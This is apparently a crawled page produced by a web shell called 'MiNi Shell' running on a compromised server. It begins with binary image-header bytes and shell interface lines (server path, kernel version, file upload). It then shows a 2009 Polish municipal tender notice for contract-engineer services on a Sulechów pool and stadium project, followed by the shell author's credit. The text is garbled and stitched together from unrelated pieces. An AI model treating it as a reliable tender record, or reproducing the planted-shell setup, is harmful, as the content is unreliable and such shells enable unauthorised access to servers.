JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090407/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090407/95764-N-2009.html

<p class="kh_header"><b>Sulechów: PEŁNIENIE FUNKCJI INŻYNIERA KONTRAKTU
w ramach zadania: Budowa krytego basenu wraz z modernizacją stadionu miejskiego w Sulechowie</b><br>
<b>Numer ogłoszenia: 95764 - 2009; data zamieszczenia: 07.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sulechów , Plac Ratuszowy 6, 66-100 Sulechów, woj. lubuskie, tel. 068 3851120, faks 068 3854686.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PEŁNIENIE FUNKCJI INŻYNIERA KONTRAKTU
w ramach zadania: Budowa krytego basenu wraz z modernizacją stadionu miejskiego w Sulechowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamówienie obejmuje pełnienie, w imieniu Gminy Sulechów, funkcji Inżyniera Kontraktu, w ramach zadania inwestycyjnego pod nazwą Budowa krytego basenu wraz z modernizacją stadionu miejskiego w Sulechowie, współfinansowanego z Lubuskiego Regionalnego Programu Operacyjnego na lata 2007-2013 Priorytet V -Rozwój i modernizacja infrastruktury turystycznej i kulturalnej, Działanie 5.1. - Rozwój i modernizacja regionalnej infrastruktury turystycznej i kulturowej 
2.	Do obowiązków Wykonawcy, jako inżyniera kontraktu, należeć będzie w szczególności:
1)	przeprowadzenie analizy dokumentacji projektowej pod kątem jej kompletności i skoordynowania poszczególnych branż oraz przedstawienie wniosków Zamawiającemu; 
2)	udzielanie odpowiedzi na pytania skierowane do Zamawiającego, dotyczące dokumentacji projektowej, w terminie do 5 dni od daty przekazania treści pytań przez Zamawiającego, a także udział w opracowaniu treści odpowiedzi na ewentualne protesty i odwołania, w okresie od podpisania umowy do dnia podpisania umowy na wykonanie robót budowlanych;
3)	udział w ewentualnych wizjach lokalnych terenu budowy przez wykonawców w okresie przed złożeniem ofert;
4)	pełnienie roli inspektora nadzoru inwestorskiego, zgodnie z przepisami ustawy Prawo budowlane, poprzez regularne wizytowanie budowy, sprawowanie kontroli zgodności realizacji robót z projektem, obowiązującymi przepisami i Polskimi Normami oraz zasadami wiedzy technicznej, jak również monitorowanie postępu robót;
5)	koordynacja pracy zespołu inspektorów nadzoru;
6)	skompletowanie niezbędnych dokumentów i sporządzenie w imieniu Zamawiającego, zgodnie z art. 71 ustawy Prawo budowlane, zawiadomienia o zamierzonym terminie rozpoczęcia robót budowlanych;
7)	sporządzenie, w imieniu Zamawiającego, wniosków o wydanie przez właściwy organ dzienników budowy;
8)	pisemne wyznaczenie, w imieniu Zamawiającego, terminu przekazania terenu budowy i przekazanie, przy udziale przedstawicieli Zamawiającego, terenu budowy oraz dzienników budowy wykonawcy robót budowlanych, jak również sporządzenie protokołu ich przekazania;
9)	dopilnowanie montażu przez wykonawcę robót budowlanych tablicy informacyjnej oraz ogłoszenia zawierającego dane dotyczące bezpieczeństwa i ochrony zdrowia;
10)	prowadzenie, w imieniu Zamawiającego, całej korespondencji dotyczącej procesu inwesty-cyjnego, w tym: sporządzanie wezwań do usunięcia usterek i wad w okresie realizacji zadania, wyznaczanie terminów narad technicznych, odbiorów, przeglądów itp.;
11)	sprawdzanie rozliczeń finansowych wykonawcy robót budowlanych pod względem zgodności z harmonogramem rzeczowo-finansowym oraz kontrola prawidłowości dokumentów rozliczeniowych wykonawcy robót;
12)	opiniowanie, wnioskowanych przez wykonawcę robót budowlanych, zmian w harmonogramie rzeczowo-finansowym robót;
13)	organizowanie narad przy udziale przedstawicieli Zamawiającego, wykonawcy robót i innych uczestników procesu inwestycyjnego, jak również organizowanie cyklicznych narad technicznych dotyczących realizacji robót, co najmniej jeden raz w miesiącu lub częściej, jeżeli zajdzie taka potrzeba lub na wniosek Zamawiającego, oraz kierowanie w/w naradami;
14)	sporządzanie protokołów z narad technicznych;
15)	bieżące kontrolowanie wpisów dokonywanych w dzienniku budowy; 
16)	nadzór nad obsługą geodezyjną i potwierdzanie wykonania pomiarów wpisem do dziennika budowy;
17)	współpraca z autorami projektu budowlanego i nadzorem autorskim;
18)	rozstrzyganie w porozumieniu z kierownikiem budowy wątpliwości natury technicznej po-wstałych w okresie realizacji robót, 
19)	stałe konsultacje i doradztwo fachowe w imieniu i na rzecz Zamawiającego;
20)	przestrzeganie terminów wynikających z umowy zawartej pomiędzy Zamawiającym a wykonawcą robót budowlanych;
21)	egzekwowanie postanowień umowy zawartej z wykonawcą oraz postanowień specyfikacji istotnych warunków zamówienia w trakcie  realizacji robót budowlanych; 
22)	egzekwowanie uprawnień Zamawiającego z tytułu rękojmi za wady i gwarancji jakości na wykonane roboty budowlane;
23)	utrzymanie na bieżąco łączności między wszystkimi uczestnikami procesu inwestycyjnego, a także z przedstawicielami Zamawiającego we wszystkich sprawach dotyczących realizacji i rozliczenia robót;
24)	składanie, w terminie do 3 dni po upływie każdego miesiąca realizacji mowy, sprawozdań z realizacji zadania oraz przyczyn ewentualnych odstępstw w stosunku do harmonogramu rzeczowo-finansowego;
25)	kontrolowanie gospodarki materiałowej oraz dokonywanie sprawdzenia jakości materiałów i wyrobów, przed ich wbudowaniem, pod kątem dopuszczenia do stosowania w budownictwie - zgodnie z obowiązującymi w tym względzie przepisami prawa, a w szczególności zapobieganie stosowaniu wyrobów wadliwych względnie nie dopuszczonych do obrotu lub stosowania w budownictwie; 
26)	zatwierdzanie, przy udziale przedstawicieli Zamawiającego, przedstawianych przez wykonawcę robót budowlanych propozycji rozwiązań materiałowych;
27)	sprawdzanie zgodności przedstawianych przez wykonawcę robót budowlanych atestów, cer-tyfikatów oraz kart gwarancyjnych na wbudowane materiały i urządzenia ze stanem fak-tycznym;
28)	potwierdzanie faktycznie wykonanych robót oraz usunięcia wad;
29)	kontrolowanie postępu robót oraz zatwierdzanie rysunków wykonawczych i powykonawczych oraz harmonogramów rzeczowo-finansowych;
30)	dokonywanie odbiorów robót budowlanych zgodnie z postanowieniami umowy o roboty budowlane;
31)	dokumentowanie czynności odbioru, w szczególności sporządzanie wszelkich protokołów odbiorów, w tym protokołu odbioru końcowego, notatek itp., kompletowanie dokumentów odbioru, protokołów badań i sprawdzeń, atestów, certyfikatów, kart gwarancyjnych, prób i pomiarów;
32)	wykonania w 4 egzemplarzach pełnej dokumentacji fotograficznej z realizacji budowy w wersji drukowanej i elektronicznej - w/w dokumentację z realizacji budowy Wykonawca ma obowiązek przekazać protokolarnie Zamawiającemu nie później, niż w dniu doręczenia Zamawiającemu ostatniej faktury VAT; 
33)	sporządzenia, zgodnie z art. 56 ustawy Prawo budowlane, zawiadomienia o zakończeniu budowy obiektu budowlanego i zamiarze przystąpienia do jego użytkowania, organów wy-szczególnionych w w/w unormowaniu;
34)	kompletowanie dokumentów niezbędnych do zawiadomienia o zakończenia budowy oraz przekazania obiektu do użytkowania;
35)	sporządzenie zawiadomienia do organu nadzoru budowlanego o zakończeniu budowy obiektu budowlanego i zamiarze przystąpienia do jego użytkowania oraz wniosku o udzielenie pozwolenia na użytkowanie;
36)	niezwłoczne powiadamianie Zamawiającego o konieczności wykonania robót nie objętych umową z wykonawcą robót budowlanych, niezbędnych do zrealizowania zadania inwestycyjnego, celem podjęcia stosownej decyzji; bez zgody Zamawiającego Wykonawca nie jest upoważniony do wydawania wykonawcy robót budowlanych polecenia wykonania tych robót;
37)	sporządzanie, po uprzedniej konsultacji z Zamawiającym, protokołów konieczności wykonania robót, o których mowa w pkt. 36 powyżej, wraz ze szczegółowym uzasadnieniem;
38)	sporządzanie kosztorysów inwestorskich na roboty, których konieczność została stwierdzona w trakcie realizacji robót;
39)	weryfikowanie konieczności wykonania robót, o których mowa w pkt. 36 powyżej, oraz kosztorysów dotyczących wykonania tych robót; 
40)	prowadzenie rozliczeń budowy w sposób umożliwiający prawidłowe sporządzenie dowodów wytworzenia środka trwałego (OT);
41)	sporządzenie po zakończeniu realizacji zadania dowodów wytworzenia środka trwałego i  przekazania na majątek trwały (OT), zgodnie z zasadami określonymi w klasyfikacji rodzajowej środków trwałych, w terminie do 30 dni od daty wystawienia ostatniej faktury VAT przez wykonawcę robót budowlanych;
42)	prawidłowe i terminowe sporządzanie, w imieniu Zamawiającego, wszelkich niezbędnych dokumentów i informacji, w tym m. in.:
a)	sprawozdań miesięcznych, kwartalnych, rocznych oraz końcowego z realizacji zadania inwestycyjnego;
b)	harmonogramów rzeczowo-finansowych;
c)	prognoz wydatków na kolejne lata budżetowe;
d)	kompletnych wniosków o płatność do Instytucji Zarządzającej LRPO;
e)	innych wymaganych dokumentów koniecznych do rozliczenia zadania i przekazania dofinansowania z LRPO,
zgodnie z zasadami i na formularzach określonych w umowie o współfinansowanie zadania inwestycyjnego; 
43)	udział w kontrolach i przeglądach przeprowadzanych przez instytucje do tego upoważnione, w tym przez Instytucją Zarządzającą LRPO:
a)	w okresie do uzyskania pozwolenia na użytkowanie włącznie;
b)	w okresie po uzyskaniu pozwolenia na użytkowanie;
44)	uczestniczenie, w okresie gwarancji jakości na wykonane roboty budowlane, w przeglądach gwarancyjnych wynikających z umowy zawartej pomiędzy Zamawiającym i wykonawcą robót budowlanych; do dnia upływu terminu gwarancji jakości Wykonawca powinien być dostępny na każde żądanie Zamawiającego;
45)	sporządzanie dokumentacji z przeglądu gwarancyjnego obejmującej: wykaz usterek i wad, podanie zaleceń odnośnie ich usunięcia oraz sporządzanie wezwań do usunięcia usterek i wad w okresie gwarancji jakości;
46)	dokonywanie odbioru robót realizowanych przez wykonawcę robót w wykonaniu gwarancji jakości lub uprawnień Zamawiającego z tytułu rękojmi za wady, w tym w szczególności sprawdzanie poprawności usunięcia usterek i wad stwierdzonych podczas przeglądów gwarancyjnych, a nadto sporządzanie dokumentacji odbioru w/w robót, w tym zwłaszcza protokołów odbioru;
47)	podejmowanie innych racjonalnych działań, nie wymienionych powyżej, które zabezpieczałyby interes Zamawiającego i przyczyniły się do sprawnego oraz prawidłowego zrealizowania zadania inwestycyjnego.
3.	Wykonawca może przewidzieć wykonanie zamówienia przez podwykonawców.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.52.00.00-9, 71.54.00.00-5, 71.63.10.00-0, 71.63.13.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 7.1.	Wykonawca musi spełniać warunki zawarte w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 24 ust. 1 i 2 i w art. 22 ust. 1 ustawy Prawo zamówień publicznych. 
7.2.	Sytuacja finansowa:
7.2.1.	Wykonawca musi dysponować środkami finansowymi wystarczającymi do realizacji przedmiotu zamówienia przy założeniu, że wynagrodzenie za zakres usług objętych zamówieniem, do wysokości 85 % wynagrodzenia, będzie wypłacane miesięcznie z dołu na podstawie faktur VAT wystawianych przez Wykonawcę i doręczanych Zamawiającemu każdorazowo nie wcześniej niż na koniec miesiąca kalendarzowego obowiązywania umowy, zgodnie z harmonogramem płatności, przy czym pierwsza faktura VAT może być wystawiona przez Wykonawcę nie wcześniej, niż ostatniego roboczego dnia miesiąca następującego po miesiącu zawarcia umowy.
Zamawiający dokona wypłaty pozostałych 15 % wynagrodzenia po zakończeniu realizacji zadania inwestycyjnego i uzyskaniu pozwolenia na użytkowanie.
7.1.1.	Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie pro-wadzonej działalności na sumę nie mniejszą niż 400.000,- zł, słownie: czterysta tysięcy złotych 00/100.
Zamawiający dokona wypłaty pozostałych 15 % wynagrodzenia po zakończeniu realizacji zadania inwestycyjnego i uzyskaniu pozwolenia na użytkowanie.
7.3.	Doświadczenie zawodowe - Wykonawca musi wykazać się zrealizowaniem, udokumento-wanym np. referencjami, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej trzech usług związanych z pełnieniem funkcji Inżyniera Kontraktu lub Inwestora Zastępczego dla realizacji inwestycji o wartości nie mniejszej niż 5 000 000,- zł każda ( słownie: pięć milionów złotych 00/100).
7.4.	Potencjał kadrowy: 
7.4.1.	Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel w celu obsadzenia stanowisk:
1)	koordynatora zespołu inspektorów nadzoru inwestorskiego;
2)	inspektorów nadzoru z uprawnieniami do kierowania robotami budowlanymi w specjalności:
a)	konstrukcyjno - budowlanej bez ograniczeń - min. 1 osoba - inspektor nadzoru w tej specjalności musi wykazać się nadzorowaniem co najmniej 2 obiektów kubaturowych użyteczności publicznej o kubaturze powyżej 15 000  m3,
b)	drogowej - min. 1 osoba - inspektor nadzoru w tej specjalności musi wykazać się nadzorowaniem co najmniej 2 zadań, w których powierzchnia nawierzchni utwardzonych z kostki brukowej betonowej lub kamiennej wyniosła nie mniej niż  2000 m2,
c)	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - min. 1 osoba - inspektor nadzoru w tej specjalności musi wykazać się nadzorowaniem co najmniej 2 obiektów budowlanych, w których wystąpiły instalacje technologiczne oczyszczania lub uzdatniania wody lub ścieków;
d)	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - min. 1 osoba - inspektor nadzoru w tej specjalności musi wykazać się nadzorowaniem co najmniej 2 obiektów budowlanych mających w zakresie instalacje automatyki i sterowania instalacji technologicznych oczyszczania lub uzdatniania wody lub ścieków,
7.4.2.	W skład zespołu Inżyniera Kontraktu może wchodzić dowolna liczba osób.
Ponadto w skład zespołu muszą wchodzić osoby posiadające doświadczenie w nadzorowaniu robót związanych z:
1)	montażem i uruchomieniem mieszanych systemów grzewczych tj. pomp ciepła z wymiennikiem powietrznym, odzysku ciepła z wentylacji nawiewno-wywiewnej i kanalizacji sanitarnej, kolektorów  słonecznych, technologii kotłowni gazowej;
2)	budową boisk z nawierzchnią z poliuretanu na podbudowie betonowej;
3)	uruchomieniem oprogramowania - dla elektronicznego systemu dostępu i pomiaru czasu przebywania i naliczania należności za korzystanie z usług w obrębie krytego basenu, a także systemu monitoringu i telewizji przemysłowej,
4)	instalacją sieci informatycznej.
7.4.3.	Wszystkie osoby wyszczególnione w pkt. 1.4.1 ppkt 2) muszą:
1)	wykazać się minimum pięcioletnim doświadczeniem w nadzorowaniu robót w zakresie posiadanych przez siebie uprawnień w specjalnościach określonych powyżej;
2)	być członkami Izby Inżynierów Budownictwa;
3)	mieć opłacone wymagane składki zgodnie z Ustawą o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. nr 5, poz. 42, z poźn. zm.);
4)	opłacone ubezpieczenie od odpowiedzialności cywilnej zgodnie z Rozporządzeniem Ministra Finansów z dnia 11 grudnia 2003 r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej architektów oraz inżynierów budownictwa. (Dz. U. nr 220, poz. 2174 z 2003 r.).
Ocena spełniania warunków udziału, w postępowaniu, przez Wykonawców zostanie dokonana według kryterium spełnia/nie spełnia. Wykonawca nie spełniający warunków zostanie wykluczony z postępowania, a jego oferta odrzucona..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Wypełniony druk oferty załącznik nr 1. 
2.	Dane Wykonawcy załącznik nr 1 a.
3.	Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych -zał. nr 2. 
4.	W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych do oferty należy dołączyć aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert.
  Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,   
  zamiast dokumentu, o którym mowa w pkt. 4 składa dokument lub dokumenty wystawione w kraju,  
  w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości;
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentu, o którym mowa wyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5.	W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia do oferty muszą być dołączone następujące dokumenty:
5.1.	Wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenia zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz dokumenty potwierdzające , że usługi te zostały wykonane należycie na załączniku nr 3.
5.2.	 Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczest-niczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności na załączniku nr 4.
5.3.	Na potwierdzenie informacji zawartych w wykazie, którym mowa w pkt 5.2. do oferty należy dołączyć wypełnione CV z opisem doświadczenia zawodowego dla każdej osoby wymienionej w ww. wykazie - na załączniku nr 4a.
5.4.	 Pisemnego zobowiązania innych podmiotów do udostępniania osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 5.2. wykonawca wskazał osoby, którymi będzie dysponował.
6.	W celu potwierdzenia opisanego warunku znajdowania się przez Wykonawcę w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia do oferty musi być dołą-czona:
6.1.	Polisa, a przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę nie mniejszą niż 400.000,- zł słownie: czterysta tysięcy złotych. 
7.	W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia:
7.1.	zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielenie zamówienia albo do reprezentowania w tym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego; Pełnomocnictwo podpisane przez wszystkich Wykonawców musi być dołą-czone do oferty.
7.2.	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest złożyć wszystkie dokumenty dotyczące właściwości Wykonawcy, o których mowa w pkt 8 ppkt 3-4 ogłoszenia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.sulechow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego, Pok. nr 217.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.04.2009 godzina 09:30, miejsce: Siedziba Zamawiającego, Biuro Obsługi Interesanta pok nr 002.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com